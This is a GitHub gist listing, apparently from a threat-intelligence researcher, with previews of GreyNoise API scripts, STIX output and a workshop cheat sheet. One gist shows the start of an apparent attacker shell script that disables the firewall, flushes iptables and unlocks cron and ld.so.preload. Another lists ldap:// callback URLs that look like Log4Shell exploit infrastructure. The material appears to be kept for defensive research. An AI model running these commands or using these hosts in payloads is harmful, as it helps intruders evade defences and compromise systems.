I hereby claim:
- I am superducktoes on github.
- I am superducktoes (https://keybase.io/superducktoes) on keybase.
- I have a public key whose fingerprint is B2C5 91D5 AF7C C0B6 F068 7567 0517 E3C4 ED54 7340
To claim this, I am signing this object:
Nick Roy superducktoes
superducktoes
/ keybase.md
Created
May 17, 2019 20:34
superducktoes
/ lh
Created
December 10, 2021 21:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ulimit -n 65535 | |
| chattr -i /etc/ld.so.preload | |
| rm -f /etc/ld.so.preload | |
| chattr -R -i /var/spool/cron | |
| chattr -i /etc/crontab | |
| ufw disable | |
| iptables -F |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ldap://e2216d7a9a31.bingsearchlib.com:39356/a | |
| ldap://612877d3a59b.bingsearchlib.com:39356/a | |
| ldap://205.185.115.217:47324/a | |
| ldap://ab3419ba1f45.bingsearchlib.com:39356/a | |
| ldap://193.3.19.159:53/c | |
| ldap://ea62856c5fc3.bingsearchlib.com:39356/a | |
| ldap://43065f484327.bingsearchlib.com:39356/a | |
| ldap://5486b6edd688.bingsearchlib.com:39356/a | |
| ldap://92d27039ede4.bingsearchlib.com:39356/a | |
| ldap://45cecd2f38ca.bingsearchlib.com:39356/a |
superducktoes
/ file_ips_lookup.py
Created
June 3, 2022 18:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import fileinput | |
| import re | |
| from greynoise import GreyNoise | |
| # command usage: cat <file_ips>.txt| python3 file_ips_lookup.py | |
| api_client = GreyNoise(api_key="") | |
| ip_list = [] | |
| # parse file for ips |
superducktoes
/ greynoise_stix_out.json
Created
May 19, 2022 20:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "type": "bundle", | |
| "id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7", | |
| "objects": [ | |
| { | |
| "type": "indicator", | |
| "spec_version": "2.1", | |
| "id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564", | |
| "created": "2022-05-19T20:10:17.632149Z", | |
| "modified": "2022-05-19T20:10:17.632149Z", |
superducktoes
/ greynoise_query_large_data.py
Last active
July 29, 2022 17:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from greynoise import GreyNoise | |
| import json | |
| import csv | |
| import argparse | |
| import os | |
| from stix2 import MemoryStore, Indicator | |
| api_client = GreyNoise(api_key="") | |
| parser = argparse.ArgumentParser() |
superducktoes
/ GreyNoise GNQL Query Results
Created
November 1, 2022 22:23
Query GreyNoise without the GN SDK
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| GN_API_KEY = "" | |
| GN_QUERY = "last_seen:1d classification:malicious" | |
| GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql" | |
| HEADERS = { | |
| "accept": "application/json", |
superducktoes
/ workshop.txt
Last active
November 8, 2022 22:15
— forked from Supriya-Maz/workshop.txt
GN Road Show Workshop
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Stop Chasing Ghosts: California Roadshow | |
| Cheat Sheet | |
| You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Users at the workshop will play the role of the Security Analyst at “Milk Co.” and have to investigate the alert to understand what happened, decide how they can stop additional attacks quickly, and then do additional investigation into indicators that can be used for hunting. | |
| Question Answer Form | |
| https://stopchasingghosts.typeform.com/to/JWKos6K2 | |
| [Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc |
superducktoes
/ ip_sim_hunting.py
Created
January 11, 2023 16:57
Build Splunk queries based on IP sim output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| api_key = "" | |
| limit = 10 # can change for more | |
| if(len(sys.argv) < 2): | |
| print("need an IP") | |
| quit() | |
| headers = { |
superducktoes
/ greynoise_plotting.py
Created
January 11, 2023 17:41
plot last_seen for GreyNoise query
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import matplotlib.pyplot as plt | |
| import numpy as np | |
| import requests | |
| import json | |
| GN_API_KEY = "" | |
| GN_QUERY = 'jira last_seen:30d' | |
| GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql" | |
| HEADERS = { |
OlderNewer